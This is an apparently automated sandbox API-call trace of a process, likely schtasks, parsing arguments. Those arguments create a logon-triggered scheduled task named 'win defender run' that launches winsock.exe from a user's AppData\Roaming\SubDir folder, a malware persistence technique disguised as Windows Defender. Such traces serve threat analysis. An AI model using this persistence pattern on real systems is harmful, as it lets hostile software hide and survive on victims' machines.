4 [0189.210] RtlRestoreLastWin32Error () returned 0x490 [0189.210] lstrlenW (lpString="m") returned 1 [0189.210] lstrlenW (lpString="m") returned 1 [0189.210] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.210] lstrlenW (lpString="tn") returned 2 [0189.210] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.210] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0189.210] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.211] lstrlenW (lpString="|m|") returned 3 [0189.211] lstrlenW (lpString="|tn|") returned 4 [0189.211] RtlRestoreLastWin32Error () returned 0x490 [0189.211] lstrlenW (lpString="i") returned 1 [0189.211] lstrlenW (lpString="i") returned 1 [0189.211] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.211] lstrlenW (lpString="tn") returned 2 [0189.211] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.211] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0189.211] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.211] lstrlenW (lpString="|i|") returned 3 [0189.211] lstrlenW (lpString="|tn|") returned 4 [0189.211] RtlRestoreLastWin32Error () returned 0x490 [0189.211] lstrlenW (lpString="tn") returned 2 [0189.211] lstrlenW (lpString="tn") returned 2 [0189.212] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.212] lstrlenW (lpString="tn") returned 2 [0189.212] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.212] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.212] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.212] lstrlenW (lpString="|tn|") returned 4 [0189.212] lstrlenW (lpString="|tn|") returned 4 [0189.212] StrStrIW (lpFirst="|tn|", lpSrch="|tn|") returned="|tn|" [0189.212] RtlRestoreLastWin32Error () returned 0x0 [0189.212] RtlRestoreLastWin32Error () returned 0x0 [0189.212] lstrlenW (lpString="win defender run") returned 16 [0189.213] lstrlenW (lpString="-/") returned 2 [0189.213] StrChrIW (lpStart="-/", wMatch=0x4710077) returned 0x0 [0189.213] RtlRestoreLastWin32Error () returned 0x490 [0189.213] RtlRestoreLastWin32Error () returned 0x490 [0189.213] RtlRestoreLastWin32Error () returned 0x0 [0189.213] lstrlenW (lpString="win defender run") returned 16 [0189.213] StrChrIW (lpStart="win defender run", wMatch=0x3a) returned 0x0 [0189.213] RtlRestoreLastWin32Error () returned 0x490 [0189.213] RtlRestoreLastWin32Error () returned 0x0 [0189.213] lstrlenW (lpString="win defender run") returned 16 [0189.213] RtlRestoreLastWin32Error () returned 0x0 [0189.213] RtlRestoreLastWin32Error () returned 0x0 [0189.213] lstrlenW (lpString="/sc") returned 3 [0189.213] lstrlenW (lpString="-/") returned 2 [0189.213] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.213] lstrlenW (lpString="create") returned 6 [0189.213] lstrlenW (lpString="create") returned 6 [0189.213] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.213] lstrlenW (lpString="sc") returned 2 [0189.213] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.213] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0189.214] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.214] lstrlenW (lpString="|create|") returned 8 [0189.214] lstrlenW (lpString="|sc|") returned 4 [0189.214] StrStrIW (lpFirst="|create|", lpSrch="|sc|") returned 0x0 [0189.214] RtlRestoreLastWin32Error () returned 0x490 [0189.214] lstrlenW (lpString="?") returned 1 [0189.214] lstrlenW (lpString="?") returned 1 [0189.214] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.214] lstrlenW (lpString="sc") returned 2 [0189.215] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.215] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0189.215] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.215] lstrlenW (lpString="|?|") returned 3 [0189.215] lstrlenW (lpString="|sc|") returned 4 [0189.215] RtlRestoreLastWin32Error () returned 0x490 [0189.215] lstrlenW (lpString="s") returned 1 [0189.215] lstrlenW (lpString="s") returned 1 [0189.215] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.215] lstrlenW (lpString="sc") returned 2 [0189.215] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.215] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0189.215] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.215] lstrlenW (lpString="|s|") returned 3 [0189.215] lstrlenW (lpString="|sc|") returned 4 [0189.216] RtlRestoreLastWin32Error () returned 0x490 [0189.216] lstrlenW (lpString="u") returned 1 [0189.216] lstrlenW (lpString="u") returned 1 [0189.216] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.216] lstrlenW (lpString="sc") returned 2 [0189.216] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.216] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0189.216] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.216] lstrlenW (lpString="|u|") returned 3 [0189.216] lstrlenW (lpString="|sc|") returned 4 [0189.216] RtlRestoreLastWin32Error () returned 0x490 [0189.216] lstrlenW (lpString="p") returned 1 [0189.216] lstrlenW (lpString="p") returned 1 [0189.216] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.216] lstrlenW (lpString="sc") returned 2 [0189.216] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.216] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0189.216] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.217] lstrlenW (lpString="|p|") returned 3 [0189.217] lstrlenW (lpString="|sc|") returned 4 [0189.217] RtlRestoreLastWin32Error () returned 0x490 [0189.217] lstrlenW (lpString="ru") returned 2 [0189.217] lstrlenW (lpString="ru") returned 2 [0189.217] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.217] lstrlenW (lpString="sc") returned 2 [0189.217] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.217] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0189.217] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.217] lstrlenW (lpString="|ru|") returned 4 [0189.217] lstrlenW (lpString="|sc|") returned 4 [0189.217] StrStrIW (lpFirst="|ru|", lpSrch="|sc|") returned 0x0 [0189.218] RtlRestoreLastWin32Error () returned 0x490 [0189.218] lstrlenW (lpString="rp") returned 2 [0189.218] lstrlenW (lpString="rp") returned 2 [0189.218] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.218] lstrlenW (lpString="sc") returned 2 [0189.218] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.218] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0189.218] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.218] lstrlenW (lpString="|rp|") returned 4 [0189.218] lstrlenW (lpString="|sc|") returned 4 [0189.218] StrStrIW (lpFirst="|rp|", lpSrch="|sc|") returned 0x0 [0189.219] RtlRestoreLastWin32Error () returned 0x490 [0189.219] lstrlenW (lpString="sc") returned 2 [0189.219] lstrlenW (lpString="sc") returned 2 [0189.219] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.219] lstrlenW (lpString="sc") returned 2 [0189.219] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.219] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.219] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.219] lstrlenW (lpString="|sc|") returned 4 [0189.219] lstrlenW (lpString="|sc|") returned 4 [0189.219] StrStrIW (lpFirst="|sc|", lpSrch="|sc|") returned="|sc|" [0189.220] RtlRestoreLastWin32Error () returned 0x0 [0189.220] RtlRestoreLastWin32Error () returned 0x0 [0189.220] lstrlenW (lpString="ONLOGON") returned 7 [0189.220] lstrlenW (lpString="-/") returned 2 [0189.220] StrChrIW (lpStart="-/", wMatch=0x471004f) returned 0x0 [0189.220] RtlRestoreLastWin32Error () returned 0x490 [0189.220] RtlRestoreLastWin32Error () returned 0x490 [0189.220] RtlRestoreLastWin32Error () returned 0x0 [0189.220] lstrlenW (lpString="ONLOGON") returned 7 [0189.220] StrChrIW (lpStart="ONLOGON", wMatch=0x3a) returned 0x0 [0189.220] RtlRestoreLastWin32Error () returned 0x490 [0189.221] RtlRestoreLastWin32Error () returned 0x0 [0189.221] GetProcessHeap () returned 0x4780000 [0189.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x478ab28 [0189.221] _memicmp (_Buf1=0x478ab28, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.221] lstrlenW (lpString="ONLOGON") returned 7 [0189.221] GetProcessHeap () returned 0x4780000 [0189.221] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0xc, Size=0x10) returned 0x478aa38 [0189.221] lstrlenW (lpString="ONLOGON") returned 7 [0189.221] lstrlenW (lpString=" \x09") returned 2 [0189.221] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0189.221] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0189.221] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0189.221] StrChrW (lpStart=" \x09", wMatch=0x4c) returned 0x0 [0189.221] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0189.221] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0189.222] StrChrW (lpStart=" \x09", wMatch=0x4f) returned 0x0 [0189.222] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0189.222] GetLastError () returned 0x0 [0189.222] lstrlenW (lpString="ONLOGON") returned 7 [0189.222] lstrlenW (lpString="ONLOGON") returned 7 [0189.222] RtlRestoreLastWin32Error () returned 0x0 [0189.222] RtlRestoreLastWin32Error () returned 0x0 [0189.222] lstrlenW (lpString="/tr") returned 3 [0189.222] lstrlenW (lpString="-/") returned 2 [0189.222] StrChrIW (lpStart="-/", wMatch=0x471002f) returned="/" [0189.222] lstrlenW (lpString="create") returned 6 [0189.222] lstrlenW (lpString="create") returned 6 [0189.223] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.223] lstrlenW (lpString="tr") returned 2 [0189.223] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.223] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8 [0189.223] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.223] lstrlenW (lpString="|create|") returned 8 [0189.223] lstrlenW (lpString="|tr|") returned 4 [0189.223] StrStrIW (lpFirst="|create|", lpSrch="|tr|") returned 0x0 [0189.223] RtlRestoreLastWin32Error () returned 0x490 [0189.223] lstrlenW (lpString="?") returned 1 [0189.223] lstrlenW (lpString="?") returned 1 [0189.223] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.223] lstrlenW (lpString="tr") returned 2 [0189.223] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.223] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3 [0189.224] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.224] lstrlenW (lpString="|?|") returned 3 [0189.224] lstrlenW (lpString="|tr|") returned 4 [0189.224] RtlRestoreLastWin32Error () returned 0x490 [0189.224] lstrlenW (lpString="s") returned 1 [0189.224] lstrlenW (lpString="s") returned 1 [0189.224] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.224] lstrlenW (lpString="tr") returned 2 [0189.224] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.224] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3 [0189.224] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.224] lstrlenW (lpString="|s|") returned 3 [0189.224] lstrlenW (lpString="|tr|") returned 4 [0189.224] RtlRestoreLastWin32Error () returned 0x490 [0189.225] lstrlenW (lpString="u") returned 1 [0189.225] lstrlenW (lpString="u") returned 1 [0189.225] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.225] lstrlenW (lpString="tr") returned 2 [0189.225] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.225] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3 [0189.225] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.225] lstrlenW (lpString="|u|") returned 3 [0189.225] lstrlenW (lpString="|tr|") returned 4 [0189.225] RtlRestoreLastWin32Error () returned 0x490 [0189.225] lstrlenW (lpString="p") returned 1 [0189.225] lstrlenW (lpString="p") returned 1 [0189.225] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.225] lstrlenW (lpString="tr") returned 2 [0189.225] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.225] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3 [0189.225] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.226] lstrlenW (lpString="|p|") returned 3 [0189.226] lstrlenW (lpString="|tr|") returned 4 [0189.226] RtlRestoreLastWin32Error () returned 0x490 [0189.226] lstrlenW (lpString="ru") returned 2 [0189.226] lstrlenW (lpString="ru") returned 2 [0189.226] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.226] lstrlenW (lpString="tr") returned 2 [0189.226] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.226] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4 [0189.226] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.226] lstrlenW (lpString="|ru|") returned 4 [0189.226] lstrlenW (lpString="|tr|") returned 4 [0189.226] StrStrIW (lpFirst="|ru|", lpSrch="|tr|") returned 0x0 [0189.226] RtlRestoreLastWin32Error () returned 0x490 [0189.226] lstrlenW (lpString="rp") returned 2 [0189.226] lstrlenW (lpString="rp") returned 2 [0189.226] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.227] lstrlenW (lpString="tr") returned 2 [0189.227] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.227] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4 [0189.227] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.227] lstrlenW (lpString="|rp|") returned 4 [0189.227] lstrlenW (lpString="|tr|") returned 4 [0189.227] StrStrIW (lpFirst="|rp|", lpSrch="|tr|") returned 0x0 [0189.227] RtlRestoreLastWin32Error () returned 0x490 [0189.227] lstrlenW (lpString="sc") returned 2 [0189.227] lstrlenW (lpString="sc") returned 2 [0189.227] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.227] lstrlenW (lpString="tr") returned 2 [0189.227] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.227] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4 [0189.227] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.227] lstrlenW (lpString="|sc|") returned 4 [0189.227] lstrlenW (lpString="|tr|") returned 4 [0189.228] StrStrIW (lpFirst="|sc|", lpSrch="|tr|") returned 0x0 [0189.228] RtlRestoreLastWin32Error () returned 0x490 [0189.228] lstrlenW (lpString="mo") returned 2 [0189.228] lstrlenW (lpString="mo") returned 2 [0189.228] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.228] lstrlenW (lpString="tr") returned 2 [0189.228] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.228] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4 [0189.228] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.228] lstrlenW (lpString="|mo|") returned 4 [0189.228] lstrlenW (lpString="|tr|") returned 4 [0189.228] StrStrIW (lpFirst="|mo|", lpSrch="|tr|") returned 0x0 [0189.228] RtlRestoreLastWin32Error () returned 0x490 [0189.228] lstrlenW (lpString="d") returned 1 [0189.229] lstrlenW (lpString="d") returned 1 [0189.229] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.229] lstrlenW (lpString="tr") returned 2 [0189.229] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.229] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3 [0189.229] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.229] lstrlenW (lpString="|d|") returned 3 [0189.229] lstrlenW (lpString="|tr|") returned 4 [0189.229] RtlRestoreLastWin32Error () returned 0x490 [0189.229] lstrlenW (lpString="m") returned 1 [0189.229] lstrlenW (lpString="m") returned 1 [0189.229] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.229] lstrlenW (lpString="tr") returned 2 [0189.229] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.229] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3 [0189.230] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.230] lstrlenW (lpString="|m|") returned 3 [0189.230] lstrlenW (lpString="|tr|") returned 4 [0189.230] RtlRestoreLastWin32Error () returned 0x490 [0189.230] lstrlenW (lpString="i") returned 1 [0189.230] lstrlenW (lpString="i") returned 1 [0189.230] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.230] lstrlenW (lpString="tr") returned 2 [0189.230] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.230] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3 [0189.230] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.230] lstrlenW (lpString="|i|") returned 3 [0189.230] lstrlenW (lpString="|tr|") returned 4 [0189.230] RtlRestoreLastWin32Error () returned 0x490 [0189.230] lstrlenW (lpString="tn") returned 2 [0189.231] lstrlenW (lpString="tn") returned 2 [0189.231] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.231] lstrlenW (lpString="tr") returned 2 [0189.231] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.231] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4 [0189.231] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.231] lstrlenW (lpString="|tn|") returned 4 [0189.231] lstrlenW (lpString="|tr|") returned 4 [0189.231] StrStrIW (lpFirst="|tn|", lpSrch="|tr|") returned 0x0 [0189.231] RtlRestoreLastWin32Error () returned 0x490 [0189.231] lstrlenW (lpString="tr") returned 2 [0189.231] lstrlenW (lpString="tr") returned 2 [0189.231] _memicmp (_Buf1=0x4787440, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.231] lstrlenW (lpString="tr") returned 2 [0189.232] _memicmp (_Buf1=0x4787470, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.232] _vsnwprintf (in: _Buffer=0x4789470, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.232] _vsnwprintf (in: _Buffer=0x4789590, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4 [0189.232] lstrlenW (lpString="|tr|") returned 4 [0189.232] lstrlenW (lpString="|tr|") returned 4 [0189.232] StrStrIW (lpFirst="|tr|", lpSrch="|tr|") returned="|tr|" [0189.232] RtlRestoreLastWin32Error () returned 0x0 [0189.232] RtlRestoreLastWin32Error () returned 0x0 [0189.232] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.232] lstrlenW (lpString="-/") returned 2 [0189.232] StrChrIW (lpStart="-/", wMatch=0x4710043) returned 0x0 [0189.232] RtlRestoreLastWin32Error () returned 0x490 [0189.232] RtlRestoreLastWin32Error () returned 0x490 [0189.233] RtlRestoreLastWin32Error () returned 0x0 [0189.233] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.233] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe" [0189.233] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.233] _memicmp (_Buf1=0x4787320, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.233] _memicmp (_Buf1=0x478aa08, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.233] RtlRestoreLastWin32Error () returned 0x7a [0189.233] RtlRestoreLastWin32Error () returned 0x0 [0189.233] RtlRestoreLastWin32Error () returned 0x0 [0189.233] lstrlenW (lpString="C") returned 1 [0189.233] RtlRestoreLastWin32Error () returned 0x490 [0189.233] RtlRestoreLastWin32Error () returned 0x0 [0189.233] _memicmp (_Buf1=0x478ab28, _Buf2=0x3a2708, _Size=0x7) returned 0 [0189.233] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.233] GetProcessHeap () returned 0x4780000 [0189.233] HeapValidate (hHeap=0x4780000, dwFlags=0x0, lpMem=0x478aa38) returned 1 [0189.233] GetProcessHeap () returned 0x4780000 [0189.234] RtlReAllocateHeap (Heap=0x4780000, Flags=0xc, Ptr=0x478aa38, Size=0x72) returned 0x478b3d8 [0189.234] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\SubDir\\winsock.exe") returned 56 [0189.234] lstrlenW (lpString=" \x09") returned 2 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x3a) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0189.234] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x4a) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x30) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x4e) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x76) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x7a) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x58) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x41) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x44) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0189.235] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0189.236] StrChrW (lpStart=" \x09", 